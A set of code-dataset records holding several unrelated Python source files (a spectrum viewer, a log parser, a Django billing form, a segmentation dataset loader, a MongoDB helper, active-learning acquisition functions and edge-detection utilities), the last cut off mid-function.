TextEditor, HGroup, VGroup, CustomEditor, Handler, CheckListEditor, Heading\n\nfrom pkg_resources import resource_filename\n\n#TODO: would like two-finger swipe side-to-side to move plot in wavenumber\n#TODO: (maybe) would like pinch to zoom/unzoom in wavenumber?\n#TODO: vertical resizing, extra space should go into plot, not UI area\n#TODO: central wavelength should have some up/down arrow buttons\n\nimport itertools\n\n\nclass _MPLFigureEditor(Editor):\n\n scrollable = True\n\n def init(self, parent):\n self.control = self._create_canvas(parent)\n self.set_tooltip()\n\n def update_editor(self):\n pass\n\n def _create_canvas(self, parent):\n \"\"\" Create the MPL canvas. \"\"\"\n frame = QtGui.QWidget()\n mpl_canvas = FigureCanvas(self.value)\n mpl_canvas.setParent(frame)\n\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(mpl_canvas)\n frame.setLayout(vbox)\n\n return frame\n\nclass MPLFigureEditor(BasicEditorFactory):\n\n klass = _MPLFigureEditor\n\nclass MPLInitHandler(Handler):\n \"\"\"Handler calls mpl_setup() to initialize mpl events\"\"\"\n\n def init(self, info):\n \"\"\"This method gets called after the controls have all been\n created but before they are displayed.\n \"\"\"\n info.object.mpl_setup()\n return True\n\nsize = (800, 600)\ntitle = \"xatmos viewer\"\n\ncolors = itertools.cycle(['b', 'g', 'r', 'c', 'm', 'orange'])\nhitran_path = os.path.split(resource_filename(__name__, 'atmos.txt.gz'))[0]\nhitran_files = glob.glob(hitran_path + '/hitran_abridged*txt*')\nmolecules = {}\nfor curfile in hitran_files:\n curname = re.match('^.*hitran_abridged_(.*)\\.txt.*$', curfile).groups()[0]\n molecules[curname] = {'hitran_filename':resource_filename(__name__, os.path.split(curfile)[-1]),\n 'hitran':None, 'plot_lines':None, 'plot_text':None, 'color':colors.next()}\n\nclass AtmosViewer(HasTraits):\n central_wavenumber = CFloat(1000)\n bandwidth = CFloat(10)\n\n selected_line_wavenumber = Float(-1.)\n\n figure = Instance(Figure, ())\n\n all_on = Button()\n all_off = Button()\n selected_molecules = List(editor=CheckListEditor(values=molecules.keys(),\n cols=2, format_str = '%s'))\n\n mplFigureEditor = MPLFigureEditor()\n\n trait_view = View(VGroup(Item('figure', editor=mplFigureEditor, show_label=False),\n HGroup('10',\n VGroup('40',\n Item(name='central_wavenumber',\n editor=TextEditor(auto_set=False, enter_set=True)),\n Item(name='bandwidth',\n editor=TextEditor(auto_set=False, enter_set=True)),\n HGroup(Item(name='selected_line_wavenumber'),\n show_border=True),\n show_border=True),\n HGroup(\n VGroup('20', Heading(\"Molecules\"),\n Item(name='all_on', show_label=False),\n Item(name='all_off', show_label=False)),\n Item(name='selected_molecules', style='custom', show_label=False),\n show_border=True), '10'),\n '10'),\n handler=MPLInitHandler,\n resizable=True, title=title, width=size[0], height=size[1])\n\n\n def __init__(self):\n super(AtmosViewer, self).__init__()\n self.colors = {'telluric':'black',\n 'orders':'black'}\n self.molecules = molecules\n self.selected_molecules = []\n orders_filename = resource_filename(__name__, 'orders.txt')\n self.texes_orders = pandas.io.parsers.read_csv(orders_filename, sep='\\t', header=None, skiprows=3)\n atmos_filename = resource_filename(__name__, 'atmos.txt.gz')\n self.atmos = pandas.io.parsers.read_csv(gzip.open(atmos_filename, 'r'), sep='\\t', skiprows=7, index_col='# wn')\n self.molecule_lookup_points = {} # keys are e.g. 
'O3', with a dict of {'wn':..., 'y':...}\n self.axes = self.figure.add_subplot(111)\n self.axes.plot(self.atmos.index, self.atmos['trans1mm'], color=self.colors['telluric'])\n self.axes.plot(self.atmos.index, self.atmos['trans4mm'], color=self.colors['telluric'])\n for i in self.texes_orders.index:\n self.axes.plot(self.texes_orders.ix[i].values, [0.05, 0.07], color=self.colors['orders'])\n self.axes.set_xlim(self.central_wavenumber - self.bandwidth / 2.,\n self.central_wavenumber + self.bandwidth / 2.)\n self.axes.set_ylim(0, 1.0)\n self.axes.set_xlabel('Wavenumber (cm-1)')\n self.axes.xaxis.set_major_formatter(FormatStrFormatter('%6.1f'))\n self.onclick_connected = False # I don't understand why I can't do the connection here.\n self.selected_line = None\n self.selected_line_text = None\n\n def on_click(self, event):\n if event.xdata is None or event.ydata is None:\n return\n if self.selected_line in self.axes.lines:\n self.axes.lines.pop(self.axes.lines.index(self.selected_line))\n if self.selected_line_text in self.axes.texts:\n self.axes.texts.remove(self.selected_line_text)\n self.selected_line = None\n self.selected_line_text = None\n self.selected_line_wavenumber = -1\n if len(self.molecule_lookup_points) == 0:\n return\n closest = {'name':None, 'wn':-1., 'dist':9e9}\n for cur_molecule in self.molecule_lookup_points:\n wn = self.molecule_lookup_points[cur_molecule]['wn']\n ys = self.molecule_lookup_points[cur_molecule]['y']\n dist_x2 = (wn - event.xdata)**2\n xlim = self.axes.get_xlim()\n scale = ((xlim[1] - xlim[0]) / # this is like wavenumbers/inch\n (self.axes.figure.get_figwidth() * self.axes.get_position().bounds[2]))\n dist_y2 = ((ys - event.ydata)*(self.axes.figure.get_figheight() *\n self.axes.get_position().bounds[3]) * scale)**2\n dist = np.sqrt(dist_x2 + dist_y2)\n if dist.min() < closest['dist']:\n closest = {'name':cur_molecule, 'wn':wn[dist.argmin()], 'dist':dist.min()}\n self.selected_line_wavenumber = closest['wn']\n self.selected_line = self.axes.plot([closest['wn'], closest['wn']], [0, 1], '-.', color='black')[0]\n self.selected_line_text = self.axes.annotate(closest['name'] + ('%11.5f' % closest['wn']),\n (closest['wn'], 1.03), ha='center',\n annotation_clip=False)\n self.redraw()\n\n def on_scroll(self, event):\n self.central_wavenumber += self.bandwidth * event.step\n\n def _all_on_fired(self):\n self.selected_molecules = self.molecules.keys()\n\n def _all_off_fired(self):\n self.selected_molecules = []\n\n def mpl_setup(self):\n self.axes_widget = AxesWidget(self.figure.gca())\n self.axes_widget.connect_event('button_press_event', self.on_click)\n self.axes_widget.connect_event('scroll_event', self.on_scroll)\n\n @on_trait_change(\"central_wavenumber, bandwidth\")\n def replot_molecular_overplots(self):\n for i, cur_molecule in enumerate(self.selected_molecules):\n if self.molecules[cur_molecule]['hitran'] is None:\n self.molecules[cur_molecule]['hitran'] = pandas.io.parsers.read_csv( gzip.open(\n self.molecules[cur_molecule]['hitran_filename'], 'r'), skiprows=2)\n wn = self.molecules[cur_molecule]['hitran']['wavenumber']\n intensity = self.molecules[cur_molecule]['hitran']['intensity']\n w = ( (wn >= self.central_wavenumber - self.bandwidth / 2.) &\n (wn <= self.central_wavenumber + self.bandwidth / 2.) 
)\n wn = wn[w]\n intensity = intensity[w]\n plot_orders_of_magnitude = 2.\n max_line_intensity = intensity.max()\n min_line_intensity = max_line_intensity / 10**plot_orders_of_magnitude\n wn = wn[intensity >= min_line_intensity]\n intensity = intensity[intensity >= min_line_intensity]\n intensity = ((np.log10(intensity) - np.log10(min_line_intensity)) /\n (np.log10(max_line_intensity) - np.log10(min_line_intensity)))\n intensity = intensity * 0.1\n self.molecule_lookup_points[cur_molecule] = {'wn':wn, 'y':intensity + (i * 0.1) + 0.05}\n wn = wn.repeat(3)\n intensity = np.column_stack((np.zeros(len(intensity)),\n intensity,\n np.zeros(len(intensity)))).flatten() + (i * 0.1) + 0.05\n newplot = self.axes.plot(wn, intensity, self.molecules[cur_molecule]['color'])\n newtext = self.axes.annotate(cur_molecule, (self.central_wavenumber + self.bandwidth * 0.51,\n i * 0.1 + 0.065), ha='left',\n va='center', annotation_clip=False, color=self.molecules[cur_molecule]['color'])\n if self.molecules[cur_molecule]['plot_lines'] in self.axes.lines:\n self.axes.lines.pop(self.axes.lines.index(self.molecules[cur_molecule]['plot_lines']))\n self.molecules[cur_molecule]['plot_lines'] = None\n if self.molecules[cur_molecule]['plot_text'] in self.axes.texts:\n self.axes.texts.remove(self.molecules[cur_molecule]['plot_text'])\n self.molecules[cur_molecule]['plot_text'] = None\n self.molecules[cur_molecule]['plot_lines'] = newplot[0]\n self.molecules[cur_molecule]['plot_text'] = newtext\n self.redraw()\n\n def _selected_molecules_changed(self, old, new):\n self.replot_molecular_overplots()\n for cur_molecule in old:\n if cur_molecule not in new:\n if self.molecules[cur_molecule]['plot_lines'] in self.axes.lines:\n self.axes.lines.pop(self.axes.lines.index(self.molecules[cur_molecule]['plot_lines']))\n if self.molecules[cur_molecule]['plot_text'] in self.axes.texts:\n self.axes.texts.remove(self.molecules[cur_molecule]['plot_text'])\n self.molecules[cur_molecule]['plot_lines'] = None\n self.molecules[cur_molecule]['plot_text'] = None\n self.molecule_lookup_points.pop(cur_molecule, None)\n self.redraw()\n\n @on_trait_change(\"central_wavenumber, bandwidth\")\n def redraw(self):\n self.axes.set_xlim(self.central_wavenumber - self.bandwidth / 2.,\n self.central_wavenumber + self.bandwidth / 2.)\n self.axes.set_ylim(0, 1.0)\n self.figure.canvas.draw()\n\n\n\nAtmosViewer().configure_traits()\n\n","repo_name":"henryroe/xatmos","sub_path":"xatmos/xatmos.py","file_name":"xatmos.py","file_ext":"py","file_size_in_byte":12041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40886668447","text":"\nfrom datetime import datetime\nimport time\n\n\n# =============================================================================\n# Load general modules\n# =============================================================================\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ncolnames = ['channel','subchannel','date_time','timestamp','value','unit','timestring']\n\n\n\nfor i in np.arange(47,142):\n \n if i<100:\n filename = 'log0'+str(i) \n else:\n filename = 'log'+str(i) \n# print(filename)\n data = pd.read_csv(filename,header=None,sep=';')\n Nrows = data.shape[0]\n\n# df = pd.DataFrame(columns=colnames)\n channels = []\n subchannels = []\n date_times = []\n timestamps = []\n values = []\n units = []\n timestrings = []\n print(filename+': Reading file') \n for index, rows in data.iterrows():\n# print(filename+': Reading line ' 
+str(index)+' of '+str(Nrows))\n string = rows[0]\n tmp = string.split('/')\n notused = tmp[0]\n channel = tmp[1]\n string = tmp[2]\n tmp = string.split('\"')\n subchannel = tmp[0]\n string = tmp[4]\n tmp = string.split(',')\n \n if tmp[0]=='None':\n value = np.nan\n unit = np.nan\n date_time=np.nan\n timestamp=np.nan\n elif channel == 'SeapathGPSGga':\n degs = float(tmp[0][0:2])\n mins = float(tmp[0][2:])\n value = degs+mins/60\n else:\n value = float(tmp[0])\n timestring= tmp[1]\n date_time = datetime.strptime(timestring[0:-1],\"%Y-%m-%dT%H:%M:%S.%f\")\n timestamp = date_time.timestamp() \n unit = tmp[2]\n# df.loc[len(df)] = [channel,subchannel,date_time,timestamp,value,unit,timestring]\n\n channels.append(channel)\n subchannels.append(subchannel)\n date_times.append(date_time)\n timestamps.append(timestamp)\n values.append(value)\n units.append(unit)\n timestrings.append(timestring) \n print(filename+': creating dataframe') \n df = pd.DataFrame.from_dict({'channel': channels,'subchannel':subchannels,'date_time':date_times,\n 'timestamp':timestamps,'value': values, 'unit': units,'timestring': timestrings})\n\n# df = df.append({'channel': channel,'subchannel':subchannel,'date_time':date_time,\n# 'timestamp':timestamp,'value': value, 'unit': unit,'timestring': timestring},ignore_index=True)\n print(filename+': Saving file') \n df.to_csv('df_'+filename+'.csv',index=False)\n \n# lat = df.loc[df.subchannel=='Latitude']\n# long = df.loc[df.subchannel=='Longitude']\n# plt.plot(lat.value,long.value)\n \n#roll = df.loc[df.subchannel=='Roll']\n\n#plt.plot(roll.timestamp-roll.timestamp.iloc[0],roll.value)\n\n\n#lat = df.loc[df.subchannel=='Latitude']\n#long = df.loc[df.subchannel=='Longitude']\n\n\n\n\n","repo_name":"NTNU-MCS/MCSim_python","sub_path":"dev/mathima/RVG_mantests/27102022/27102022/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35989916156","text":"from django import forms\nfrom django.core.validators import RegexValidator\nCREDIT_CARD_RE = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\\\d{3})\\d{11})$'\n\n\nclass BillingForm(forms.Form):\n card_no = forms.CharField(required=True, max_length=16, validators=[\n RegexValidator(\n regex='^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\\\d{3})\\d{11})$',\n message='Card No must be numeric and contain 16 digit',\n ),\n ])\n cvc = forms.CharField(required=True, max_length=3, validators=[\n RegexValidator(\n regex='^\\d{1,10}$',\n message='Cvc must be numeric and contain 3 digit',\n ),\n ])\n exp_year = forms.CharField(required=True, max_length=4, validators=[\n RegexValidator(\n regex='^\\d{1,10}$',\n message='Year must be numeric and contain 4 digit',\n ),\n ])\n exp_month = forms.CharField(required=True, max_length=2, validators=[\n RegexValidator(\n regex='^\\d{1,10}$',\n message='Month must be numeric and contain 2 digit',\n ),\n ])\n coupon_code = forms.CharField(required=False, max_length=225)\n","repo_name":"inotite/Django-ERCTRL","sub_path":"apps/erm_billing/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"41586627898","text":"import numpy\nimport torch.utils.data as data\nimport 
torch\n\nimport os, random, cv2\nimport numpy as np\nimport Augmentor\n\nIMG_EXTENSIONS = ['.png']\n\n\ndef make_color_seg(res_image, nrow=256, ncol=256):\n color = np.zeros((nrow, ncol, 3))\n for j in range(nrow):\n for k in range(ncol):\n if (res_image[j][k] == 0):\n color[j][k] = [0, 0, 0]\n if (res_image[j][k] == 1):\n color[j][k] = [128, 0, 0]\n if (res_image[j][k] == 2):\n color[j][k] = [0, 128, 0]\n if (res_image[j][k] == 3):\n color[j][k] = [128, 128, 0]\n if (res_image[j][k] == 4):\n color[j][k] = [0, 128, 128]\n if (res_image[j][k] == 5):\n color[j][k] = [64, 0, 0]\n if (res_image[j][k] == 6):\n color[j][k] = [192, 0, 0]\n if (res_image[j][k] == 7):\n color[j][k] = [128, 64, 64]\n if (res_image[j][k] == 9):\n color[j][k] = [0, 64, 128]\n return color\n\n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in extensions)\n\n\ndef find_classes(dir):\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\ndef make_dataset(dir, extensions):\n images = []\n for root, _, fnames in sorted(os.walk(dir)):\n fnames = [fname for fname in fnames if has_file_allowed_extension(fname, extensions)]\n\n seg_names = [x for x in fnames if 'seg' in x]\n # pair off with seg if exists\n if seg_names:\n for fname in sorted(seg_names):\n img_name = fname.replace(\"_seg\", \"\")\n path = os.path.join(root, img_name)\n if not os.path.isfile(path):\n img_name = fname.replace(\"_seg\", \"_img\")\n path = os.path.join(root, img_name)\n seg_path = os.path.join(root, fname)\n item = (path, seg_path)\n images.append(item)\n else:\n img_names = [x for x in fnames if 'seg' not in x]\n for img_name in sorted(img_names):\n path = os.path.join(root, img_name)\n item = (path, None)\n images.append(item)\n\n out_file = os.path.join(dir, 'fnames.csv')\n np.savetxt(out_file, images, fmt=\"%s\", delimiter=',')\n return images\n\n\nclass DatasetFolder(data.Dataset):\n def __init__(self, root, loader, extensions, transform=None, img_size=256, num_ch=3, num_classes=8, seg_factor=1,\n aug_options=None, col_size=None):\n # classes, class_to_idx = find_classes(root)\n samples = make_dataset(root, extensions)\n self.fnames = samples\n if len(samples) == 0:\n raise(RuntimeError(\"Found 0 files in subfolders of: \" + root + \"\\n\"\n \"Supported extensions are: \" + \",\".join(extensions)))\n\n self.root = root\n # self.loader = loader\n self.seg_factor = seg_factor\n self.aug_options = aug_options\n self.num_ch = num_ch\n self.num_classes = num_classes\n\n self.img_size = img_size\n if col_size is None:\n self.col_size = self.img_size\n else:\n self.col_size = col_size\n\n self.extensions = extensions\n self.samples = samples\n\n self.transform = transform\n\n def __getitem__(self, index, visualise=False):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n path, target_path = self.samples[index]\n sample = default_loader(path, num_ch=self.num_ch)\n if target_path is not None:\n target = default_loader(target_path, seg_factor=self.seg_factor, num_ch=1)\n else:\n target = numpy.array([0.0])\n # target = []\n\n # ## 
https://github.com/mdbloice/Augmentor/blob/master/notebooks/Multiple-Mask-Augmentation.ipynb\n # collated_images_and_masks = [(path, target_path)]\n # from PIL import Image\n # images = [[np.asarray(Image.open(y)) for y in x] for x in collated_images_and_masks]\n # p = Augmentor.DataPipeline(images, [1])\n\n ## use Augmentor for image and mask transforms\n sample_aug = sample\n target_aug = target\n if self.aug_options is not None:\n # p = Augmentor.DataPipeline([sample], [1])\n p = Augmentor.DataPipeline([[sample, target]], [1])\n\n # order matters\n if sample.shape[:2]!=(self.img_size, self.col_size):\n p.resize(probability=1, height=self.img_size, width=self.col_size)\n\n for key, key_dict in self.aug_options.items():\n if key=='normalize':\n 1 # handled by torch transforms\n elif key==\"crop_random\":\n getattr(p, key)(**key_dict)\n sample_shape = sample.shape\n height, width = sample_shape[:2]\n p.resize(probability=1, width=max(width, self.col_size), height=max(height, self.img_size))\n elif key==\"shadow\":\n 1 # handled by shadow below\n else:\n getattr(p, key)(**key_dict)\n p.crop_by_size(probability=1, width=self.col_size, height=self.img_size)\n\n print(len(p.augmentor_images), len(p.augmentor_images[0]), p.augmentor_images[0][0].shape, p.augmentor_images[0][0].dtype)\n augmented_images, labels = p.sample(1)\n # print(\"=============================================\")\n # print(augmented_images)\n sample_aug = augmented_images[0][0]\n target_aug = augmented_images[0][1]\n\n if 'shadow' in self.aug_options and random.random() > self.aug_options[\"shadow\"][\"probability\"]: # only shadow img - NOT mask\n sample_aug = shadows(sample_aug)\n\n if visualise:\n import matplotlib.pyplot as plt\n import numpy as np\n plt.figure(1)\n plt.clf()\n plt.imshow(sample)\n\n plt.figure(2)\n plt.clf()\n plt.imshow(target)\n\n plt.figure(3)\n plt.clf()\n plt.imshow(sample)\n img_row, img_col = target.shape\n color = make_color_seg(target, nrow=img_row, ncol=img_col)\n plt.imshow(color, alpha=0.33)\n\n plt.figure(4)\n plt.clf()\n plt.imshow(sample_aug)\n #\n plt.figure(5)\n plt.clf()\n plt.imshow(target_aug)\n\n plt.figure(6)\n plt.clf()\n plt.imshow(sample_aug)\n img_row, img_col = target_aug.shape\n color_aug = make_color_seg(target_aug, nrow=img_row, ncol=img_col)\n plt.imshow(color_aug, alpha=0.33)\n\n if self.transform is not None:\n sample = self.transform(sample_aug)\n target_aug = bound_classes(target_aug, self.num_classes)\n target = torch.from_numpy(target_aug)\n\n return sample, target\n\n def __len__(self):\n return len(self.samples)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\ndef cv2_loader(path, num_ch):\n if num_ch==1:\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n else:\n img = cv2.imread(path)\n return img\n\n\ndef default_loader(path, seg_factor=30, num_ch=3):\n if 'seg' in path:\n temp = cv2_loader(path, num_ch=1)\n temp = temp/seg_factor\n return temp.astype(np.uint8)\n else:\n return cv2_loader(path, num_ch=num_ch)\n\n\ndef bound_classes(target_aug, num_classes):\n target_aug = np.maximum(target_aug, 
np.zeros(target_aug.shape))\n target_aug = np.minimum(target_aug, np.full(target_aug.shape, fill_value=num_classes - 1))\n return target_aug\n\n\ndef shadows(ori, visualise=False):\n ori_out = ori.copy()\n\n h, w = ori.shape\n # want shadows in middlish areas\n h_lim = 200\n h_height = 100\n w_width = 10\n\n h_start = int(h_lim * random.random()) + ((h-1)-h_lim)\n h_end = h_start + int(h_height*random.random())\n w_start = int(w * random.random())\n w_end = w_start + int(w_width*random.random())\n\n shadow_amt = random.uniform(0.6, 0.8)\n ori_out[h_start:h_end, w_start:w_end] = np.round(shadow_amt * ori[h_start:h_end, w_start:w_end] )\n\n if visualise:\n import matplotlib.pyplot as plt\n plt.figure(1)\n plt.clf()\n plt.imshow(ori)\n\n plt.figure(2)\n plt.clf()\n plt.imshow(ori_out)\n return ori_out\n\n\nclass ImageFolder(DatasetFolder):\n def __init__(self, root, transform=None, loader=default_loader, img_size=256, num_ch=3, num_classes=8, seg_factor=1,\n aug_options=None, col_size=None):\n super(ImageFolder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform,\n img_size=img_size,\n num_ch=num_ch,\n num_classes=num_classes,\n seg_factor=seg_factor,\n aug_options=aug_options,\n col_size=col_size)\n self.imgs = self.samples\n","repo_name":"18072193589/ganseg-3","sub_path":"Deep-Learing/NetModel/ganseg-3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74635166083","text":"import pymongo\nimport logging\n\nfrom typing import Mapping, Union, List\n\n\nclass Singleton(type):\n \"\"\"\n Meta class. Ensures that class has only one instance.\n https://sourcemaking.com/design_patterns/singleton\n https://sourcemaking.com/design_patterns/singleton/python/1\n \"\"\"\n\n def __init__(cls, name, bases, attrs, **kwargs):\n super().__init__(name, bases, attrs)\n cls._instance = None\n\n def __call__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super().__call__(*args, **kwargs)\n return cls._instance\n\n\nclass MongoDBDAO(metaclass=Singleton):\n '''\n This class plays a role of the Data Access Object (DAO) for MongoDB.\n It contains main CRUD operations (Create, Read, Update and Delete), used by BRISE to operate with a database\n '''\n def __init__(self, mongo_host: str, mongo_port: int, database_name: str, user: str, passwd: str):\n self.client = pymongo.MongoClient(f\"mongodb://{user}:{passwd}@{mongo_host}:{mongo_port}/?authSource=admin\")\n self.database = self.client[database_name]\n self.logger = logging.getLogger(__name__)\n\n def write_one_record(self, collection_name: str, record: Mapping) -> None:\n collection = self.database[collection_name]\n x = collection.insert_one(record)\n self.logger.debug(\"Written to mongo. Id: \" + str(x.inserted_id))\n\n def write_many_records(self, collection_name: str, records: List[Mapping]) -> None:\n collection = self.database[collection_name]\n x = collection.insert_many(records)\n self.logger.debug(\"Written many to mongo. 
Id: \" + str(x.inserted_ids))\n\n def get_records(self,\n collection_name: str,\n filter_: Union[Mapping, None],\n projection: Union[Mapping, List, None]) -> List[Mapping]:\n result = []\n collection = self.database[collection_name]\n for record in collection.find(filter_, projection=projection):\n result.append(dict(record))\n return result\n\n def get_last_record(self,\n collection_name: str,\n filter_: Union[Mapping, None],\n projection: Union[Mapping, List, None]) -> Union[Mapping, None]:\n collection = self.database[collection_name]\n records = collection.find(filter_, projection=projection)\n if records.count() > 0:\n for record in records.skip(records.count() - 1):\n return dict(record)\n else:\n return None\n\n def update_record(self, collection_name: str, filter_: Mapping, new_val: Mapping) -> None:\n collection = self.database[collection_name]\n new_values = {\"$set\": new_val}\n collection.update_one(filter_, new_values)\n","repo_name":"YevheniiSemendiak/text_matcher","sub_path":"back/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31621652082","text":"import math\n\nfrom modAL.models import base\nfrom modAL.utils import data as mod_data\nimport numpy as np\n\n\ndef greedy(optimizer,\n features,\n n_instances = 1):\n \"\"\"Takes the best instances by inference value sorted in ascending order.\n\n Args:\n optimizer: BaseLearner. Model to use to score instances.\n features: modALinput. Featurization of the instances to choose from.\n n_instances: Integer. The number of instances to select.\n\n Returns:\n Indices of the instances chosen.\n \"\"\"\n return np.argpartition(optimizer.predict(features), n_instances)[:n_instances]\n\n\ndef half_sample(optimizer,\n features,\n n_instances = 1,\n alpha = 1.0):\n \"\"\"Chooses the instances with the highest uncertainty.\n\n Args:\n optimizer: BaseLearner. Model to use to score instances.\n features: modALinput. Featurization of the instances to choose from.\n n_instances: Integer. The number of instances to select.\n alpha: Float. Half sampling weighting parameter. 
Higher weights will bias\n towards better inference values.\n\n Returns:\n Indices of the instances chosen.\n \"\"\"\n predictions = optimizer.predict(features)\n\n half_differences = (\n (np.sign(predictions[::2]) * np.abs(predictions[::2])**alpha -\n np.sign(predictions[1::2]) * np.abs(predictions[1::2])**alpha) / 2).T\n\n num_splits = half_differences.shape[1]\n delta = half_differences / np.sqrt(num_splits)\n picked_indices = []\n big_h = np.eye(num_splits)\n\n selectable = np.ones(len(delta))\n\n for _ in range(n_instances):\n delta_transpose_delta = np.matmul(np.transpose(delta), delta)\n variances = np.sum(delta * delta, axis=1)\n\n candidate_score = selectable * np.sum(\n np.matmul(delta, delta_transpose_delta) * delta,\n axis=1) / (1 + variances)\n\n best_score = np.argmax(candidate_score)\n picked_indices.append(best_score)\n selectable[best_score] = 0\n\n best_delta = delta[best_score, :] / math.sqrt(variances[best_score])\n\n best_lambda = 1 - 1 / math.sqrt(1 + variances[best_score])\n update = np.eye(num_splits) - best_lambda * np.outer(best_delta, best_delta)\n\n delta = np.matmul(delta, update)\n\n big_h = np.matmul(big_h, update)\n\n return np.array(picked_indices)\n","repo_name":"google-research/google-research","sub_path":"al_for_fep/selection/acquisition_functions.py","file_name":"acquisition_functions.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"12131899970","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# takes image, mean and psnr value and returns the corresponding noisy image\n# (2d numpy array)\ndef noise(img, mean, psnr):\n (rows, cols) = img.shape\n # x max and y max for image\n i_min = img.min()\n i_max = img.max()\n # find sigma for a given psnr\n sigma = (i_max-i_min)/(10**(psnr/20))\n\n # random.normal is used to create white noise with mean, sigma parameters\n white_noise_img = np.random.normal(mean, sigma, (rows, cols))\n white_noise_img = white_noise_img.reshape(rows, cols)\n noisy = img + white_noise_img\n return noisy\n\n\n# returns 2d gaussian (numpy array) for a given sigma\ndef get_gaussian(sigma, plot=False):\n n = int(np.ceil(3*sigma)*2+1)\n gauss1D = cv2.getGaussianKernel(n, sigma)\n # 2d gaussian equals to matrix multiplication of 1d gaussian with the equivalent reversed\n gauss2D = gauss1D @ gauss1D.T\n # plot gaussian\n if plot:\n hf = plt.figure()\n ax = hf.add_subplot(111, projection='3d')\n\n # define x, y axis\n X = np.arange(-(n-1)/2, (n-1)/2+1, 1)\n Y = np.arange(-(n-1)/2, (n-1)/2+1, 1)\n X, Y = np.meshgrid(X, Y)\n # z is 2d gaussian function\n Z = gauss2D\n ax.plot_surface(X, Y, Z)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_title('Gaussian for sigma = '+str(sigma))\n plt.show()\n return gauss2D\n\n# returns Laplacian of Gaussian for a given sigma\n# 2d numpy array\ndef get_LoG(sigma, plot=False):\n n = int(np.ceil(3*sigma)*2+1)\n # define kernel for LoG\n # (0,0) -> center of array\n # (abs(n-1)/2) -> edges of array\n vect = np.linspace(-(n-1)/2, (n-1)/2, n)\n [xs, ys] = np.meshgrid(vect, vect)\n # compute LoG with known mathematical type\n nom = (np.square(xs) + np.square(ys) - 2*(sigma**2))\n den = 2*np.pi*(sigma**6)\n exp = np.exp(-(np.square(xs)+np.square(ys))/(2*(sigma**2)))\n LoG = (nom/den)*exp\n # plot gaussian\n if plot:\n hf = plt.figure()\n ax = hf.add_subplot(111, projection='3d')\n X = np.arange(-(n - 1) / 2, (n - 1) / 2 + 1, 1)\n Y = np.arange(-(n - 1) / 2, (n - 1) / 2 + 1, 
1)\n X, Y = np.meshgrid(X, Y)\n Z = LoG\n ax.plot_surface(X, Y, Z)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_title('LoG for sigma = ' + str(sigma))\n plt.show()\n return LoG\n\n# returns convoluted image for a given kernel\ndef convolution(img, kernel):\n result = cv2.filter2D(img, -1, kernel)\n return result\n\n# takes image read with cv2 and\n# returns 2d numpy array, non linear laplacian of image\ndef non_linear_laplacian(img):\n # define kernel for morphological filters\n kern = np.array([\n [0, 1, 0],\n [1, 1, 1],\n [0, 1, 0]\n ], dtype=np.uint8)\n dilated_img = cv2.dilate(img, kern)\n eroded_img = cv2.erode(img, kern)\n non_lin = dilated_img + eroded_img - 2*img\n return non_lin\n\n# takes image, converts it to binary and returns\n# dilated minus eroded image which is a\n# 2d numpy array\ndef zero_crossings(img):\n binary = (img >= 0).astype(np.float)\n kern = np.array([\n [0, 1, 0],\n [1, 1, 1],\n [0, 1, 0]\n ], dtype=np.uint8)\n dilated_img = cv2.dilate(binary, kern)\n eroded_img = cv2.erode(binary, kern)\n frontier = dilated_img - eroded_img\n return frontier\n\n\ndef smooth_decline(img, theta):\n (xs, ys) = np.gradient(img)\n gradient = np.sqrt(np.square(xs) + np.square(ys))\n I_max = gradient.max()\n result = (gradient > theta * I_max)\n return result\n\n\ndef edge_detection(img, sigma, theta, linear):\n gaussian_kernel = get_gaussian(sigma)\n gaussian = convolution(img, gaussian_kernel)\n\n if linear:\n 